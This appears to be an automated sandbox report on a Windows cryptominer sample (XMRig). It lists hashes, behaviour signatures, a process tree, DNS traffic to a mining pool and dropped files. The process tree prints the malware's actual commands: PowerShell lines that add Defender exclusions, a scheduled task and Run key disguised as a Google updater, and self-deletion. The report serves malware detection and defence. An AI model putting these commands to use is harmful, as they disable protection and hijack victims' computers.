Resubmissions
25/01/2024, 16:55 UTC
240125-vfcyksbhgr 1024/01/2024, 17:15 UTC
240124-vstf4aecaj 1023/01/2024, 19:27 UTC
240123-x6cfvagbd9 1023/01/2024, 19:27 UTC
240123-x6bvbafgem 1023/01/2024, 19:27 UTC
240123-x6bjjsgbd8 1023/01/2024, 19:27 UTC
240123-x6ax1sfgek 1023/01/2024, 19:27 UTC
240123-x6abgsfgej 1023/01/2024, 19:27 UTC
240123-x591qagbd7 1023/01/2024, 19:27 UTC
240123-x59d7agbd6 1023/01/2024, 19:27 UTC
240123-x584esgbd5 10Analysis
-
max time kernel
424s -
max time network
1801s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
-
submitted
23/01/2024, 19:27 UTC
General
-
Target
grhsghsGHswgh/UU4Ddwqm5zcuLzGR.exe
-
Size
2.0MB
-
MD5
a16a669a09bf158058b83e04e69fe38e
-
SHA1
f6c94763850d9e590d86057139e8895a7aacdeea
-
SHA256
cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e
-
SHA512
658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6
-
SSDEEP
49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner payload 30 IoCs
-
Deletes itself 1 IoCs
-
Executes dropped EXE 1 IoCs
-
Loads dropped DLL 1 IoCs
-
UPX packed file 30 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops file in System32 directory 5 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Program Files directory 4 IoCs
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Modifies data under HKEY_USERS 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 25 IoCs
-
Suspicious use of AdjustPrivilegeToken 31 IoCs
-
Suspicious use of WriteProcessMemory 23 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\UU4Ddwqm5zcuLzGR.exe"C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\UU4Ddwqm5zcuLzGR.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\UU4Ddwqm5zcuLzGR.exe"2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 7203⤵
-
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe qtdiqnkejoz2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 31⤵
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskeng.exetaskeng.exe {DE72AB0F-C30B-46F2-A087-E942CD6B3F79} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"1⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor1⤵
- Detects videocard installed
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
Network
-
DNSpool.hashvault.proRemote address:8.8.8.8:53Requestpool.hashvault.proIN AResponsepool.hashvault.proIN A45.76.89.70pool.hashvault.proIN A95.179.241.203
-
95.179.241.203:3333pool.hashvault.protls
-
8.8.8.8:53pool.hashvault.prodns
DNS Request
pool.hashvault.pro
DNS Response
45.76.89.7095.179.241.203
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
31KB
MD5c955f19adea3ed22841d52d6751f473a
SHA13846ef263bf4dcf01c4191d9506f09bbc5a054cd
SHA2563434b42ba3dd5efc221c47eea3c49a0f77734d2eacadfd1c1824c119794b134b
SHA51271f7fff15c0e2e0d60bd4052b3a90f287ce3ba7c7671e4b77efcea1fc4a344bb84b870b5bb66cdb4325980919ef71d286ee9571be677f59756dc97b64507ccd5
-
Filesize
116KB
MD565b518addace5bf5470307853b989861
SHA1e71126bb0662b8fa05342d3f0d3d023896dde6dd
SHA256ef2af6e50e5bbec6f3e2c40057bf477d94746073e04a5c8bf4e90d3bdc892672
SHA51222e86bafac80ce0b9f596453bde0714d2211aead1a1df876c0f55ad6369ba213986e7d7c6d44dcdd47d4588ff7f57273bf8e0745eaf92e4daad947ae0cacb3b4
-
Filesize
198B
MD537dd19b2be4fa7635ad6a2f3238c4af1
SHA1e5b2c034636b434faee84e82e3bce3a3d3561943
SHA2568066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
SHA51286e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5
-
Filesize
7KB
MD5d83ea173017a5019b9327c4cad3f269d
SHA1585b54fbc71d4daf750cf091c082dcbc7987e092
SHA2566dd461b1756040f2d6df7ac44c88bbd21b982cfa5eb9f8ce6491882e870a8039
SHA5125d332eff353a41e5fedf141f44731e657a2263b9b0893933da1c0de0889f408a05f802505968140d5959c676986bbfe1a1b5408cbf524643d87c6faf513cc1aa
-
Filesize
21KB
MD5d54a979328b5df200fb166c49994b375
SHA193342cd198178b2942ec163234921fe101da4e62
SHA256df201afb076a1928c44499e007ed78d46b7498a028eb89970f557c2304f33391
SHA512ede3aa7f72b72d76e4c28a0310bceaba1965596c88049935a52dc981e4b33fc2ac95a21805aced0225f9e35ea1d1451c72c078fe47295dd5da0bf9d95ff58c78
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
128KB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
128KB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
2.9MB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
88KB
-
Filesize
88KB
-
Filesize
2.1MB
-
Filesize
2.1MB
-
Filesize
4KB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
2.9MB
-
Filesize
32KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
412KB
-
Filesize
9.6MB
-
Filesize
12KB
-
Filesize
9.6MB
-
Filesize
2.1MB
-
Filesize
2.1MB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
32KB
-
Filesize
2.9MB